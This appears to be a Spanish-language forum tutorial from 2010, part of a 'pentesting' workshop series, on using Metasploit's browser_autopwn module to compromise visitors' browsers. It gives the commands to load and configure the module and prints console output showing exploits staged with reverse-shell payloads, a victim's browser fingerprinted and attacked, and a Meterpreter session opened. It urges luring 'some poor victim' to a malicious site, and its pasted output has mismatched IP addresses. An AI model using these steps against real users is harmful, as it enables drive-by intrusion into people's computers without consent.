[Taller]Pentesting S.O. parte VI
Publicado: 25 Jul 2010, 08:31
+Temario
-+Modulo browser_autopwn
-+¿Como funciona?
-+Instalacion
-+Comando show options
-+Configurando browser_autopwn
-+Obteniendo sessions
-+Conclusion
- Bueno este taller a sido muy interesante y bueno ya les
enseñe algunso truquillos con el metasploit y bueno
asi hay mucho smas y bueno ahora veremos otra forma
de introducirnos en una pc y como lo haremos ?
pues bueno ahora utilizaremos un modulo de
metasploit creado por desarrolladores de metasploit
egipcios jejejej
- Bueno estes es el modulo que utilizaremos esta vez muy efectivo por cierto
- Sencillo navega y toma fingerprints antesde lanzar exploits a la victima!
Por tanto si la victima usa mozilla no se podra explotar EI7
ayudandonos mucho a reducir tiempo y exploits utilizables en
la victima.
- La instalacion de este modulo que nos ofrecen los
desarroladores de metasploit es muy sencilla.
Primero lanzamos nuestro metasploit ya saben
Código: Seleccionar todo
sudo ./msfconsole
- Y bueno ahora lo que tenemos qu ehacer es llamarlo y lo hacemos de esta forma!
Código: Seleccionar todo
msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) >
+Comando show options
- Bueno ya lo llamamos ahora lanzamos el comando show options para ver que hay que configurar
Código: Seleccionar todo
msf auxiliary(browser_autopwn) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
msf auxiliary(browser_autopwn) >
Código: Seleccionar todo
msf auxiliary(browser_autopwn) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) >
- Esto es basicamente lo que hay que configurar
LHOST: la ip que vamos a escanear
y
URIPATH: aqui pones /
y listo podemos correr nuestro scanner
jejejej
veamos
Código: Seleccionar todo
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module running as background job
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 192.168.1.102...
[*] ---
...snip...
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/zCtg7oC
[*] Local IP: http://192.168.1.102:8080/zCtg7oC
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/vTNGJx
[*] Local IP: http://192.168.1.102:8080/vTNGJx
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/abmR33jxStsF7
[*] Local IP: http://192.168.1.102:8080/abmR33jxStsF7
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
...snip...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/RdDDhKANpV
[*] Local IP: http://192.168.1.102:8080/RdDDhKANpV
[*] Server started.
[*] --- Done, found 11 exploit modules
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.102:8080/
[*] Server started.
Now all we need to do is get some poor victim to navigate to our malicious website and when they do, Browser Autopwn will target their browser based
on its version.
[*] Request '/' from 192.168.1.128:1767
[*] Request '/?sessid=V2luZG93czpYUDp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ni4wO1NQMjo=' from 192.168.1.128:1767
[*] JavaScript Report: Windows:XP:undefined:en-us:x86:MSIE:6.0;SP2:
[*] No database, using targetcache instead
[*] Responding with exploits
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.1.128:1774...
[*] Sending Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability to 192.168.1.128:1775...
[*] Sending Microsoft Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.128:1774...
[*] Sending EXE payload to 192.168.1.128:1775...
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:62360 -> 192.168.1.128:1798)
msf auxiliary(browser_autopwn) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.102:62360 -> 192.168.1.108:1798
- Y listo tenemos sessions
Código: Seleccionar todo
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
- Bueno ahora ya tenemos mas metodos de intrucion en un
sistema interesante todo lo que ofrece metasploit no?¡??
Saludos esperen la parte VII !